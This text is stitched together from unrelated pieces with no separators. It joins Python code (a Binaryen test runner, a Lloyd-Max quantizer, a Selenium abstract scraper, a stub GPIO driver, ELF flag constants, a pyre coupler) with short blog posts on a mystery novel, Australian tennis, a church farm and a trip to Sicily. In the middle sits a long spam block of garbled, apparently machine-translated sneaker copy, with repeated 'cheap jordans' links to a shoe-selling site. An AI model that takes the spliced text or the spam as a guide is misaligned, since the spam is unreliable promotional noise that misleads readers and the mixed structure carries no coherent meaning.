        # lit expects to be run as its own executable
        cmd = [sys.executable, lit_script, lit_tests, '-vv']
        result = subprocess.run(cmd)
        if result.returncode != 0:
            shared.num_failures += 1
        if shared.options.abort_on_first_failure and shared.num_failures:
            raise Exception("lit test failed")

    shared.with_pass_debug(run)


# Ordered registry of suite name -> runner; order is the default run order.
TEST_SUITES = OrderedDict([
    ('version', run_version_tests),
    ('wasm-opt', wasm_opt.test_wasm_opt),
    ('wasm-dis', run_wasm_dis_tests),
    ('crash', run_crash_tests),
    ('dylink', run_dylink_tests),
    ('ctor-eval', run_ctor_eval_tests),
    ('wasm-metadce', run_wasm_metadce_tests),
    ('wasm-reduce', run_wasm_reduce_tests),
    ('spec', run_spec_tests),
    ('lld', lld.test_wasm_emscripten_finalize),
    ('wasm2js', wasm2js.test_wasm2js),
    ('validator', run_validator_tests),
    ('example', run_example_tests),
    ('unit', run_unittest),
    ('binaryenjs', binaryenjs.test_binaryen_js),
    ('binaryenjs_wasm', binaryenjs.test_binaryen_wasm),
    ('lit', run_lit),
])


# Run all the tests
def main():
    """Run the requested (or default) suites; return a process exit code."""
    all_suites = TEST_SUITES.keys()
    skip_by_default = ['binaryenjs', 'binaryenjs_wasm']

    if shared.options.list_suites:
        for suite in all_suites:
            print(suite)
        return 0

    for r in shared.requested:
        if r not in all_suites:
            print('invalid test suite: %s (see --list-suites)\n' % r)
            return 1

    if not shared.requested:
        shared.requested = [s for s in all_suites if s not in skip_by_default]

    for test in shared.requested:
        TEST_SUITES[test]()

    # Check/display the results
    if shared.num_failures == 0:
        print('\n[ success! ]')
    if shared.warnings:
        print('\n' + '\n'.join(shared.warnings))
    if shared.num_failures > 0:
        print('\n[ ' + str(shared.num_failures) + ' failures! ]')
        return 1
    return 0


if __name__ == '__main__':
    sys.exit(main())
Something Good to Read: Welcome 2018! Reading plus a sparkler: a perfect year's-end combo. I wrapped up 2017 by staying up late to finish reading Glass Houses, the latest book in the series by Louise Penny featuring Chief Inspector Gamache. In this outing, Gamache is going all in on stopping drug trafficking. Trafficking which, this being a novel, just happens to be reaching an evil climax in his little village of Three Pines. But it's all good for us, the reader, who can enjoy being wrapped up in the web of mystery and suspense being spun by Louise Penny. Glass Houses was worth staying up late to read; and now I regret that it is over. That is just the kind of book that qualifies as highly recommended reading.
# Copyright (c) 2017 Elias Riedel Gårding
# Licensed under the MIT License

# Lloyd-Max quantization with a tracked (Bayesian-style) state distribution:
# after each transmitted index, the plant-state pdf is propagated through the
# control law and convolved with the process noise, then the quantizer is
# redesigned for the updated pdf.

import numpy as np
from scipy.interpolate import interp1d
from scipy.signal import convolve
import matplotlib.pyplot as plt

from . import lloyd_max


class Encoder:
    """Quantizes measurements with the tracker's current Lloyd-Max encoder."""

    def __init__(self, sim, tracker):
        self.sim = sim
        self.tracker = tracker

    def encode(self, *msg):
        """Encode a measurement; returns a 1-tuple with the quantizer index."""
        # Just encode it with Lloyd-Max
        # (pass it to channel encoder or digital channel)
        i = self.tracker.lm_encoder.encode(*msg)
        # Keep the tracked distribution in sync with what was transmitted.
        self.tracker.update(i)
        return (i,)

    def get_tracker(self):
        return self.tracker


class Decoder:
    """Reconstructs the state estimate from a received quantizer index."""

    def __init__(self, sim, tracker):
        self.sim = sim
        self.tracker = tracker

    def clone(self):
        # Deep-ish copy: shares sim but clones the tracker state.
        return self.__class__(self.sim, self.tracker.clone())

    def decode(self, *msg):
        """Decode one received index; returns a 1-tuple with the estimate."""
        # Decode with the Lloyd-Max decoder
        # (receive from channel encoder or digital channel)
        x_est = self.tracker.lm_decoder.decode(*msg)

        # Update the distribution tracker
        assert len(msg) == 1  # One integer
        i = msg[0]
        self.tracker.update(i)

        return (x_est,)


# Hikmet's code

# Constants
RESOLUTION = 1 << 7  # number of grid points used when discretizing pdfs


class Distribution:
    """A pdf with finite support, represented as (interval, callable pdf)."""

    def __init__(self, interval, pdf):
        self.interval = interval  # (a, b) support of the pdf
        self.pdf = pdf            # callable t -> density at t
        self.is_hikmet = True     # marker distinguishing this representation

    @classmethod
    def bySamples(cls, x, fx):  # Interpolate to get the pdf
        """Build a Distribution from samples (x, fx), trimming negligible tails."""
        # Use logarithmic interpolation to preserve log-concavity
        dx = x[1] - x[0]
        fx = np.array(fx, dtype=float) / sum(fx) / dx  # normalize to a density
        Fx = np.cumsum(fx) * dx
        # Trim where the CDF is within 1e-5 of 0 or 1.
        v1 = sum(1 for i in Fx if i < 1e-5)
        v2 = sum(1 for i in Fx if i < 1 - 1e-5)
        x = x[v1:v2]
        fx = fx[v1:v2]
        fx = np.array(fx, dtype=float) / sum(fx) / dx  # renormalize after trimming
        logfx = np.log(fx)
        logpdf = interp1d(x, logfx, kind='linear', bounds_error=False,
                          fill_value=float('-inf'))
        pdf = lambda t: np.exp(logpdf(t))
        return cls((x[0], x[-1]), pdf)

    def convolution(d1, d2):
        """Return the distribution of the sum of two independent variables."""
        a1, b1 = d1.interval
        a2, b2 = d2.interval
        delta = max(b1 - a1, b2 - a2) / float(RESOLUTION)
        f1 = [d1.pdf(i) for i in np.arange(a1, b1, delta)]
        f2 = [d2.pdf(i) for i in np.arange(a2, b2, delta)]
        fx = convolve(f1, f2)
        # Support of the sum starts at a1 + a2.
        x = [a1 + a2 + delta * i for i in range(len(fx))]
        return Distribution.bySamples(x, fx)


def LM(distribution, n):
    """Design an n-level Lloyd-Max quantizer for `distribution`.

    Returns (boundaries, centers) where boundaries has n+1 entries
    (including the support endpoints) and centers has n entries.
    Iterates centers-from-boundaries / boundaries-from-centers until the
    discretized boundary indices stop moving (or maxiter is reached).
    """
    # Some definitions
    maxiter = 1 << 10
    N = RESOLUTION
    a, b = distribution.interval
    x = np.linspace(a, b, N)
    fx = np.array([distribution.pdf(i) for i in x])
    fx[np.isnan(fx)] = 0
    dx = (b - a) / (N - 1.)
    Fx = np.cumsum(fx) * dx
    # Map a real boundary value to the nearest grid index, clamped to [0, N-1].
    index = lambda y: int(min(N - 1, max(0, np.round((y - a) / float(dx)))))
    # Initialization
    c = np.zeros(n)
    p = np.array([x[int(i)] for i in np.round(np.linspace(0, N, num=n + 1)[1:-1])])
    # Loop
    error = 1
    iteration = 0
    while error > 0 and iteration < maxiter:
        iteration += 1
        # centers from boundaries
        pin = [0] + [index(i) for i in p] + [N - 1]
        for i in range(n):
            c[i] = sum(x[j] * fx[j] for j in range(pin[i], pin[i + 1] + 1))\
                / sum(fx[j] for j in range(pin[i], pin[i + 1] + 1))
        pin_temp = pin
        # boundaries from centers
        p = (c[:-1] + c[1:]) / 2.
        pin = [0] + [index(i) for i in p] + [N - 1]
        # Convergence metric: total movement of boundary grid indices.
        error = sum(abs(pin_temp[i] - pin[i]) for i in range(n + 1))
    return ([a] + list(p) + [b], c)


class DistributionTracker:
    """Keeps track of the distribution of the plant's state."""

    def __init__(self, sim, n_levels, distr=None, lm_encoder=None,
                 lm_decoder=None):
        self.sim = sim
        self.n_levels = n_levels

        if distr is None:
            assert lm_encoder is None and lm_decoder is None
            W = self.sim.params.W
            # NOTE(review): labeled N(0, W) but the formula is W times a
            # standard-normal pdf (variance does not scale with W) — confirm
            # against the intended noise model.
            self.fw = Distribution((-10, 10),
                    lambda x: W * np.exp(-x**2 / 2.) / np.sqrt(2.0 * np.pi))  # pdf of w_t: N(0,W) with support (-10,10)
            self.distr = self.fw
            boundaries, levels = LM(self.distr, 2**self.sim.params.quantizer_bits)
            self.lm_encoder = lloyd_max.Encoder(boundaries)
            self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
        else:
            assert lm_encoder is not None and lm_decoder is not None
            self.distr = distr
            self.lm_encoder = lm_encoder
            self.lm_decoder = lm_decoder

        # DEBUG
        self.distrs = []

    def clone(self):
        """Return a copy sharing sim but with independent tracker state."""
        new = self.__class__(self.sim, self.n_levels, self.distr,
                             self.lm_encoder, self.lm_decoder)

        # DEBUG
        new.distrs = self.distrs[:]
        # Copy any debug/derived attributes that happen to exist.
        if hasattr(self, 'x'):
            new.x = self.x
        if hasattr(self, 'fx'):
            new.fx = self.fx
        if hasattr(self, 'w_x'):
            new.w_x = self.w_x
        if hasattr(self, 'w_fx'):
            new.w_fx = self.w_fx
        if hasattr(self, 'd1'):
            new.d1 = self.d1
        if hasattr(self, 'fw'):
            new.fw = self.fw

        return new

    def update(self, i, debug_globals=dict()):
        """Propagate the tracked pdf given transmitted index i, then redesign
        the Lloyd-Max quantizer for the updated pdf.

        NOTE(review): the mutable default `debug_globals=dict()` is shared
        across calls; it appears deliberate (a debugging hook that collects
        locals) — confirm before changing.
        """
        A = self.sim.params.alpha
        L = self.sim.params.L(self.sim.t)
        x_hat = self.lm_decoder.decode(i)
        u = -L * x_hat
        # Quantization cell for i, clipped to the current support.
        lo, hi = self.lm_decoder.get_interval(i)
        lo = max(lo, self.distr.interval[0])
        hi = min(hi, self.distr.interval[1])
        # Push the cell through x' = A x + u, then add process noise.
        # NOTE(review): relies on self.fw existing (set only in the
        # distr=None constructor path or copied by clone()) — verify callers.
        self.d1 = Distribution((A * lo + u, A * hi + u),
                lambda x: self.distr.pdf((x - u) / float(A)))
        self.distr = Distribution.convolution(self.d1, self.fw)
        self.distrs.append(self.distr)  # DEBUG

        # DEBUG: For inspecting the local variables interactively
        debug_globals.update(locals())

        boundaries, levels = LM(self.distr, 2**self.sim.params.quantizer_bits)
        self.lm_encoder = lloyd_max.Encoder(boundaries)
        self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
jordans for cheap -Followed by Nike, Air Jordan 1 Retro High "Rare Air" This time the network in two air Jordan 1 Retro High "thin air", orange, white, black, gray, white, black leather uppers provide lychee. Traditional models of air Jordan 1 Retro High difference is that Jordan 1 Retro High "thin air" in the use of air Qiao Danxin plate has been widely circulated in the local flag flying wing. It also follows the retro Nike used to display, it can be described as full of gimmicks. Feel good leather and vintage details, in fact, share amazing walk, it is learned two more later this year will be listed for sale, interested friends, you'd better pay close attention. cheap jordan shoes -Feelings Platinum Air Jordan 11 Low effect on the foot ! Feelings Platinum Air Jordan 11 Low effect on the foot ! This double platinum color Air Jordan 11 Low "White / Metallic Gold" Platinum popularity dazzling color, the difficulty is not low! 11 Generation is popular series is always the brand's most popular style, the classic historical background and beautiful shoe body contour, is so many fans regret follow. This time with the help of a low posture on stage, golden yellow patent leather is quite eye-catching display, with white leather outsole with Bing, indeed, people can not extricate themselves. cheap jordans online -2017 models Air Jordan 4 "Motorsports" 2017 models Air Jordan 4 "Motorsports" in-kind for the first time exposure! Michael Jordan's love for motorcycle are obvious, [url=http://www.footsneakers.com/products/?Air-Jordan-IV-(4)-Retro-n4_p1.html ] cheap jordans online [/url] but Jordan Brand has also been the main fact to build the team through a theme color of the Air Jordan 4 "Motorsports". Born in 2006, this Air Jordan 4 "Motorsports" in white leather shoe body basis, the team's dark blue tones presented in more than highlight the vitality of Spike Lee Mars on the upper picture is also unique flavor! 
Engraved rumors will return in 2017, and today is the first kind of image exposure, followed by the display only. The gorgeous blue details! Air Jordan 4 Premium "Obsidian" on sale soon! As this year's Air Jordan 4 Premium third member, [url=http://www.footsneakers.com/products/?Air-Jordan-IV-(4)-Retro-n4_p1.html ] cheap jordans [/url] which is a premium air Jordan 4 "obsidian" brings luxury to September 17! The same is gorgeous costumes transboundary luxury team in different directions and different densities covered car line texture, along with gold metal parts, solid backing on white shoes, laces and tongue tag other details to create high-quality leather, luxury not dead! Fade out of our sight Jordan Brand Women Plan "heiress set" [url=http://www.footsneakers.com/products/?Air-Jordan-I(1)-Retro-n504_p1.html ] cheap jordans for women [/url] recently brought us aj1 modeled on the Air Jordan 1 "heir." Shoes with a fine nylon fabric with an elegant light-colored leather, fresh and elegant aesthetic qualities will show you the most. it is reported that this pair of shoes designed for women to create will be officially on sale September 10, priced at $ 110. cheap jordans for sale -Air ordan 5 GS "Raptors" Jordan Brand released a new color of the air jordan 5 gs "Raptors", [url=http://www.footsneakers.com/products/?Air-Jordan-V-(5)-Retro-n5_p1.html ] cheap jordans for sale [/url] the shoes when Jordan war Raptors for color design inspiration by carbon black matte leather wrapped the body of the shoe, supplemented by details symbol of raptors red and purple embellishment, overall feeling cool strength of ten feet.The shoe is only available for sale GS version, but the maximum size of US9.5Y is equivalent to 275cm, is expected to be officially on sale in September 17th, priced at $140 dollars. Presumably a lot of shoes fan friends for 10 years ago this pair of air jordan 4 "pure Money$" remember! 
White shoe body relaxed delicate, with silver metallic decorative details, feel gorgeous directed at people!Before the exposure of the Air Jordan 7 . And front air Jordan 11 and Air Jordan 3 theme bedding, this air Jordan 12 "chocolate" sporting debut still brought profound fashion. Raw rubber outsole also queuing, chocolate-colored leather shoes, feel the energy, the trend is more subtle breathing. cheap jordans online -Female models Exclusive Air Jordan 4 GS "Deep Royal Blue" Female models Exclusive Air Jordan 4 GS "Deep Royal Blue" Four generations of familiar shoes Knight color reproduction, but appeared overwhelmed by Air Jordan 4 GS only bring a new color shoes. This pair of Air Jordan 4 GS "Deep Royal Blue" officially on sale, combined with white toe wrapped in a blue dotted gray background detail orange injection, [url=http://www.footsneakers.com/products/?Air-Jordan-IV(4)-Retro-n314_p1.html ] cheap jordans online [/url] knights style familiar atmosphere. Cool blue background brings a bright orange flash under contrasting decorative undoubtedly a girl AJ vitality share. cheap jordans for women -Air Jordan 12 GS "Dark Purple Dust" Girls Exclusive, Air Jordan 12 GS "Dark Purple Dust" It is reported that only the color GS shoes, priced at $ 140, is expected on sale this fall, currently no additional information to release, sister who might be interested a lot of attention. Bred classic black and red dress reproduced Air Jordan 1 Retro OG High, not only to the first year of 100% OG detail presented, the new lychee striae fine, plus prohibit prohibited topic lining wear, [url=http://www.footsneakers.com/products/?Air-Jordan-I-(1)-Retro-n1_p1.html ] jordans for cheap [/url] this pair of Air Jordan 1 "bred / ban "has become the focus! This heavy "double absolute" mystery, volume is unknown, but there are rumors that tens of thousands of people just twice the world! Shoes fans heart had been locked in a pair of black boots and red body! 
Today we bring near Mito tours, this classic black, feel more fashionable temperament! Will be available this September 3 Offer Air Jordan 1 Retro High OG "Bred" forbidden to wear color, [url=http://www.footsneakers.com/products/?Air-Jordan-I-(1)-Retro-n1_p1.html ] cheap jordans [/url] brought black and red and white shoes high specification litchi body,Clean white midsole and rubber outsole red, in classical style, while in a better texture to a new wearing experience. Has released official pictures, let us enjoy the next Westbrook Interpretation forbidden to wear charm. White Air Jordan Pure Money or series will return in the next year! Last seen in 2006, after a lapse of 10 years of "pure money" campaign or again, bring fresh vigor white dress! [url=http://www.footsneakers.com/products/?Air-Jordan-IV-(4)-Retro-n4_p1.html ] cheap jordans for sale [/url] DJ Folk broke the news, including the Air Jordan 4 "pure dollars," including three colors will be engraved in 2017, in addition to air and air Jordan 7 Jordan 13. Pure white in the details throughout, with silver accessories, shoes, white dress popular Air Jordan shoes is undoubtedly irresistible fresh magic!
# Scraper for AGU Fall Meeting 2015 abstracts (confex.com), driven by Selenium.
# Iterates over a numeric range of paper IDs, loads each paper page in Firefox,
# and appends any found title/authors/abstract to an Elasticsearch bulk-index
# file ("index") for the facetview UI. Python 2 script (print statements,
# pre-Selenium-4 find_element_by_* API).
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC
import time

# Output directory for the Elasticsearch bulk file (local, machine-specific path).
output = "/users/hundman/documents/data_science/hyspiri_search/facetview-hyspiri-public/agu/"
driver = webdriver.Firefox()

# Paper-ID range to scan; IDs are dense but not all exist (see `paper` check below).
start = 50000
stop = 100000

# Append mode: repeated runs (e.g. different ranges) accumulate into one bulk file.
with open(output + "index", "a") as out:
    found = 0
    for num in range(start,stop):
        # try:
        driver.get("https://agu.confex.com/agu/fm15/meetingapp.cgi/Paper/" + str(num))
        paper = None
        print str(num)
        try:
            # First page load gets a longer timeout (browser/app warm-up);
            # subsequent pages only wait 3s for the People section to render.
            load_time = 3
            if num == start:
                load_time = 10
            WebDriverWait(driver, load_time).until(EC.presence_of_element_located((By.CSS_SELECTOR, "section.item.People")))
            # Extra settle time: the page is a JS app, content can lag the selector.
            time.sleep(3)
            content = driver.find_element_by_id("main")
            paper = True
        except:
            # Timeout or missing element => treat this ID as "no paper".
            paper = False
        if paper == True:
            # "Additional" section holds the abstract text on these pages.
            abstract = content.find_element_by_css_selector("section.item.Additional")
            abstract = abstract.text
            if len(abstract) > 1:
                found += 1
                print "found: " + str(found)
                title = content.find_element_by_css_selector("li.itemTitle").text
                # Authors serialized as "name::affiliation||name::affiliation||..."
                all_auths = ""
                auth_affils = ""  # NOTE(review): unused accumulator, kept as-is
                authors = content.find_elements(By.CSS_SELECTOR, "li.RoleListItem")
                for auth in authors:
                    affil = auth.find_element_by_tag_name("span").text
                    all_auths += auth.find_element_by_tag_name("a").text + "::" + affil + "||"
                # Elasticsearch bulk API: action line followed by document line.
                string = '{ "index" : { "_index" : "agu_2015", "_type" : "type1", "_id" : "%s" } }\n' %(num)
                out.write(string)
                # NOTE(review): field values are not JSON-escaped; quotes in
                # titles/abstracts would produce invalid JSON — TODO confirm.
                doc = '''{"authors":"%s", "title":"%s", "abstract":"%s"} \n''' %(all_auths, title, abstract)
                out.write(doc.encode('utf-8'))
        # except:
        #     print "issue with: " + str(cnt)
        # cnt += 1
    print "found: " + str(found)
    out.write("\n")
driver.close()
#53876
Quiz: How much do you really know about collaboration? What are the benefits of collaboration for big brands? "I only came in for fish and chips, now I’m the digital marketer" Is collaboration the new competition?
from kervi.hal.gpio import IGPIODeviceDriver


class GPIODriver(IGPIODeviceDriver):
    """Generic no-op GPIO driver.

    A stand-in platform driver for hosts without real GPIO hardware: every
    operation only prints a trace message, and reads always return 0. It
    exposes a fixed channel map of three digital pins (GPIO1-3), two analog
    outputs (DAC1-2) and two analog inputs (ADC1-2).
    """

    def __init__(self, gpio_id="generic_gpio"):
        # Register with the kervi HAL under the given board id.
        IGPIODeviceDriver.__init__(self, gpio_id)

    def _get_channel_type(self, channel):
        """Return the kervi channel type for *channel*.

        Returns None (implicitly) for names outside the fixed channel map.
        """
        # Imported lazily to match the original module's import style.
        from kervi.hal.gpio import CHANNEL_TYPE_GPIO, CHANNEL_TYPE_ANALOG_IN, CHANNEL_TYPE_ANALOG_OUT
        if channel in ["GPIO1", "GPIO2", "GPIO3"]:
            return CHANNEL_TYPE_GPIO
        elif channel in ["DAC1", "DAC2"]:
            return CHANNEL_TYPE_ANALOG_OUT
        elif channel in ["ADC1", "ADC2"]:
            return CHANNEL_TYPE_ANALOG_IN

    def _get_channel_names(self):
        """Return the fixed list of channel names this driver exposes."""
        return ["GPIO1", "GPIO2", "GPIO3", "DAC1", "DAC2", "ADC1", "ADC2"]

    @property
    def name(self):
        """Human-readable driver name."""
        return "Generic GPIO"

    def define_as_input(self, pin, pullup=None, bounce_time=0):
        """Configure *pin* as a digital input (stub: prints only)."""
        print("define pin in")

    def define_as_output(self, pin):
        """Configure *pin* as a digital output (stub: prints only)."""
        print("define pin out")

    def define_as_pwm(self, pin, frequency, duty_cycle):
        """Configure *pin* for PWM (stub: prints only)."""
        print("define pwm")

    def set(self, pin, state):
        """Drive *pin* to *state* (stub: prints the requested state)."""
        print("set pin", state)

    def get(self, pin):
        """Read *pin*; the stub always reports 0 (low)."""
        print("get pin")
        return 0

    def pwm_start(self, channel, duty_cycle=None, frequency=None):
        """Start PWM on *channel* (stub: prints only)."""
        print("start pwm")

    def pwm_stop(self, pin):
        """Stop PWM on *pin* (stub: prints only)."""
        print("stop pwm")

    def listen(self, pin, callback, bounce_time=0):
        """Listen for edges on *pin* (stub: prints only).

        Bug fix: the original printed "listen rising" here (copy-paste from
        listen_rising), which was misleading for the generic edge listener.
        """
        print("listen")

    def listen_rising(self, pin, callback, bounce_time=0):
        """Listen for rising edges on *pin* (stub: prints only)."""
        print("listen rising")

    def listen_falling(self, pin, callback, bounce_time=0):
        """Listen for falling edges on *pin* (stub: prints only)."""
        print("listen falling")
Australian Open marks the beginning of the new tennis year, and with it comes the ‘talk’ of the hopefuls of Australia’s tennis future. The recently completed ‘December Showdown’ put on display some of the tennis that we can expect from the next generation. The result was a little surprising: the players you expected to step up didn’t, and although the competition was tight, its evenness showed that ‘stand-outs’ just didn’t eventuate. Players of similar fitness, speed, skills and, unfortunately, styles battled for a ‘wildcard’ — the major stepping stone to enhancing careers and raising expectations. The lessons of the past — of the generations that have succeeded and the generations that have fallen — seem to be ignored by this current crop. While not being critical of their energy and passion, questions must be raised about why a group of aspiring professionals equipped with different physical attributes would all ‘play’ the same. The ‘character’ (inner person) is missing from a game that, as history reminds us, continues to be for all, and to be many and varied. Play should be exercised to match the aggressive, or the passive, or the calm, or the volatile, or the planner, or the natural, or the creative, or the courageous ….. in other words, ‘be yourself’ in order to succeed and turn dreams into reality. Australia has another new generation to follow the current one, and these 16-year-olds bring something very different and modern to their game and character. Vintage Tennis over 35 years has witnessed many fallen generations; this next one, we hope, has the fortitude and single-minded determination to be one of the successful generations. A thought for some of the past and present generations (current players aged 20 to 28 years) – seek mentoring to guide a life that is there but needs to change ….. too much talent, too much waste. This entry was posted in Blog and tagged Australian Open, Australian Tennis, successful generations, tennis players. Bookmark the permalink.
#-------------------------------------------------------------------------------
# elftools: elf/constants.py
#
# Constants and flags, placed into classes for namespacing
#
# Eli Bendersky (eliben@gmail.com)
# This code is in the public domain
#-------------------------------------------------------------------------------
class E_FLAGS(object):
    """ Flag values for the e_flags field of the ELF header
    """
    # ARM: EABI version lives in the top byte of e_flags.
    EF_ARM_EABIMASK=0xFF000000
    EF_ARM_EABI_VER1=0x01000000
    EF_ARM_EABI_VER2=0x02000000
    EF_ARM_EABI_VER3=0x03000000
    EF_ARM_EABI_VER4=0x04000000
    EF_ARM_EABI_VER5=0x05000000
    # ARM: bits that GCC may legitimately set.
    EF_ARM_GCCMASK=0x00400FFF
    EF_ARM_RELEXEC=0x01
    EF_ARM_HASENTRY=0x02
    EF_ARM_SYMSARESORTED=0x04
    EF_ARM_DYNSYMSUSESEGIDX=0x8
    EF_ARM_MAPSYMSFIRST=0x10
    EF_ARM_LE8=0x00400000
    EF_ARM_BE8=0x00800000
    # ARM: floating-point ABI selection (soft vs. hard float).
    EF_ARM_ABI_FLOAT_SOFT=0x00000200
    EF_ARM_ABI_FLOAT_HARD=0x00000400

    # MIPS-specific flags.
    EF_MIPS_NOREORDER=1
    EF_MIPS_PIC=2
    EF_MIPS_CPIC=4
    EF_MIPS_XGOT=8
    EF_MIPS_64BIT_WHIRL=16
    EF_MIPS_ABI2=32
    EF_MIPS_ABI_ON32=64
    EF_MIPS_32BITMODE = 256
    EF_MIPS_NAN2008=1024
    # MIPS: architecture level is encoded in the top nibble of e_flags.
    EF_MIPS_ARCH=0xf0000000
    EF_MIPS_ARCH_1=0x00000000
    EF_MIPS_ARCH_2=0x10000000
    EF_MIPS_ARCH_3=0x20000000
    EF_MIPS_ARCH_4=0x30000000
    EF_MIPS_ARCH_5=0x40000000
    EF_MIPS_ARCH_32=0x50000000
    EF_MIPS_ARCH_64=0x60000000
    EF_MIPS_ARCH_32R2=0x70000000
    EF_MIPS_ARCH_64R2=0x80000000


class E_FLAGS_MASKS(object):
    """Masks to be used for convenience when working with E_FLAGS

    This is a simplified approach that is also used by GNU binutils
    readelf
    """
    # MIPS: ABI variant selector bits and their known values.
    EFM_MIPS_ABI = 0x0000F000
    EFM_MIPS_ABI_O32 = 0x00001000
    EFM_MIPS_ABI_O64 = 0x00002000
    EFM_MIPS_ABI_EABI32 = 0x00003000
    EFM_MIPS_ABI_EABI64 = 0x00004000


class SHN_INDICES(object):
    """ Special section indices
    """
    SHN_UNDEF=0
    SHN_LORESERVE=0xff00
    SHN_LOPROC=0xff00
    SHN_HIPROC=0xff1f
    SHN_ABS=0xfff1
    SHN_COMMON=0xfff2
    SHN_HIRESERVE=0xffff


class SH_FLAGS(object):
    """ Flag values for the sh_flags field of section headers
    """
    SHF_WRITE=0x1
    SHF_ALLOC=0x2
    SHF_EXECINSTR=0x4
    SHF_MERGE=0x10
    SHF_STRINGS=0x20
    SHF_INFO_LINK=0x40
    SHF_LINK_ORDER=0x80
    SHF_OS_NONCONFORMING=0x100
    SHF_GROUP=0x200
    SHF_TLS=0x400
    SHF_COMPRESSED=0x800
    # OS- and processor-specific flag ranges.
    SHF_MASKOS=0x0ff00000
    SHF_EXCLUDE=0x80000000
    SHF_MASKPROC=0xf0000000


class P_FLAGS(object):
    """ Flag values for the p_flags field of program headers
    """
    PF_X=0x1
    PF_W=0x2
    PF_R=0x4
    # OS- and processor-specific flag ranges.
    PF_MASKOS=0x00FF0000
    PF_MASKPROC=0xFF000000


# symbol info flags for entries
# in the .SUNW_syminfo section
class SUNW_SYMINFO_FLAGS(object):
    """ Flags for the si_flags field of entries
        in the .SUNW_syminfo section
    """
    SYMINFO_FLG_DIRECT=0x1
    SYMINFO_FLG_FILTER=0x2
    SYMINFO_FLG_COPY=0x4
    SYMINFO_FLG_LAZYLOAD=0x8
    SYMINFO_FLG_DIRECTBIND=0x10
    SYMINFO_FLG_NOEXTDIRECT=0x20
    SYMINFO_FLG_AUXILIARY=0x40
    SYMINFO_FLG_INTERPOSE=0x80
    SYMINFO_FLG_CAP=0x100
    SYMINFO_FLG_DEFERRED=0x200


class VER_FLAGS(object):
    # Flags for version sections (verdef/verneed entries).
    VER_FLG_BASE=0x1
    VER_FLG_WEAK=0x2
    VER_FLG_INFO=0x4
I write with an update on Bellwether Farm and its progress toward completion. The cold winter and wet spring caused a number of unexpected delays in construction, though this month's weather has allowed things to move forward productively. Most recently, delays in the fabrication of mechanical elements essential to fire suppression and other safety systems forced us to modify the Diocesan Episcopal Church Women Annual Meeting and a couple of other events scheduled for May and June. Nonetheless, all participants reported that their events were highly successful, even in their altered design. Because completion of all safety systems is required before occupancy permits can be issued, we have had to arrange alternative accommodations for St. Paul's, Cleveland Heights reading camp at a nearby scouting facility, though they will still have programming at Bellwether. The two weeks of Bellwether summer camp scheduled for mid-July, however, have had to be cancelled. While this is a disappointment to Camp Director Brandon Gooch and all who have been developing the camp program, it is essential that our facilities are safe and that construction on the site is complete before we initiate residential activities. Arrangements are being made to offer opportunities for those campers who had registered and their families to spend time at the farm later in the summer. Elsewhere about the farm, things are very busy. Around the barnyard, goats, sheep, and chickens have taken up residence, and the bees are busy making honey. Farm Manager Kyle Mitchell has extensive crops planted and an abundance of produce already harvested. Please come by to see what is growing and take some fresh vegetables home with you. It is beautiful at Bellwether this time of year, and there are many opportunities to volunteer and lend a hand. Don't hesitate to contact Kyle at (440) 533-5689, or Brandon at (662) 832-5696 if you'd like to spend some time helping out. They would be delighted to hear from you.
#!/usr/bin/env python # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # <LicenseText> # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # def coupler(name="coupler", facility="coupler"): return Coupler(name, facility) from pyre.components.Component import Component class Coupler(Component): def __init__(self, name, facility): Component.__init__(self, name, facility) self.exchanger = None return def initialize(self, solver): # exchanger could be either a FineGridExchanger (FGE) # or a CoarseGridExchanger (CGE) self.exchanger = solver.exchanger self.exchanger.initialize(solver) return def launch(self, solver): self.exchanger.launch(solver) return def initTemperature(self): ## # send initial temperature field from CGE to FGE ## self.exchanger.initTemperature() return def preVSolverRun(self): self.exchanger.preVSolverRun() return def postVSolverRun(self): self.exchanger.postVSolverRun() return def newStep(self): self.exchanger.NewStep() return def applyBoundaryConditions(self): self.exchanger.applyBoundaryConditions() return def stableTimestep(self, dt): dt = self.exchanger.stableTimestep(dt) return dt def endTimestep(self, steps, done): done = self.exchanger.endTimestep(steps,done) return done # version __id__ = "$Id: SnacCoupler.py 1902 2004-08-19 18:23:55Z EunseoChoi $" # End of file
Today we rise at 4:00am to make the big jump to Sicily. We have mapped everything out carefully, getting lots of advice from our hosts at the hotel on how best to reach Fiumicino. We’re sad to leave Hotel Castel Gandolfo, especially during the wee hours of the morning when there is no one around. We make our way up the stone streets one last time and remember how welcoming this place has been. It would be nice to come back again some day. In the moonlit early morning, it’s easy to find the Via Appia leading into Rome, and then the southern leg of the GRA (Grande Raccordo Anulare), the usually hectic beltway that encircles the city. For a 7:05am flight, it soon becomes apparent that we are on the early side, and that’s good. Doing Italy the way we do, we are often traveling at ridiculous hours, and this is no exception. We leave the car at the Europcar off-hours drop off near the airport, and that goes smoothly. We then walk across the bridge into the large hall that includes all of the airline ticketing desks. They are just opening up and we get right through, except for the detour to another desk nearby to pay for our extra few kilos of weight. Today we will be flying Blue Express at a low fare, so we aren’t expecting much in the way of frills. When we arrive in Catania, there is an endless wait for our bags, and this usually brings fears of lost luggage. In this case, our fears are justified. The bags don’t make it! The baggage desk staff are competent and professional, but the system supporting them is hardly that. There is no way of knowing where they are, so we have to take it on faith that they’ll arrive on the next flight from Rome, a mere three hours from now. The clerk sells us on the idea of visiting downtown Catania for a few hours, a town we were not planning to visit. It’s a warm and sunny autumn day, so we locate the bus stop and take the ride into town. The view from the bus makes it all worthwhile. 
